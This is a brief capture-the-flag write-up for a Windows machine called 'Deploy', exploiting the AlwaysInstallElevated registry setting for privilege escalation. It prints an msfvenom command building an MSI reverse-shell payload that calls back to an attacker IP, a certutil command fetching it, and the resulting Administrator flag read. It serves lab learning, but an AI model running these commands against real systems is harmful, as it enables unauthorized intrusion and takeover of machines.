30-Deploy

I uploaded winpeas.exe but i don't know why it was not working.
Pasted image 20240120224610.png

I started manual enumeration with hacktricks

Pasted image 20240121100143.png

These registers were enabled on the target machine ->
Pasted image 20240121100217.png

because these registers are enabled now i can run any msi file as root/administrator.
https://www.hackingarticles.in/windows-privilege-escalation-alwaysinstallelevated/

➜  www msfvenom -p windows/x64/shell_reverse_tcp lhost=10.10.14.11 lport=9001 -f msi -o hello.msi
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of msi file: 159744 bytes
Saved as: hello.msi
certutil -urlcache -f http://10.10.14.11/hello.msi hello.msi

.\hello.msi

Pasted image 20240121100745.png
Root.

C:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is D851-8BE0

 Directory of C:\Users\Administrator\Desktop

03/31/2019  07:16 AM    <DIR>          .
03/31/2019  07:16 AM    <DIR>          ..
04/01/2019  03:21 AM                23 flag.txt
               1 File(s)             23 bytes
               2 Dir(s)   4,172,156,928 bytes free

C:\Users\Administrator\Desktop>type flag.txt
type flag.txt
XEN{7ru573d_1...}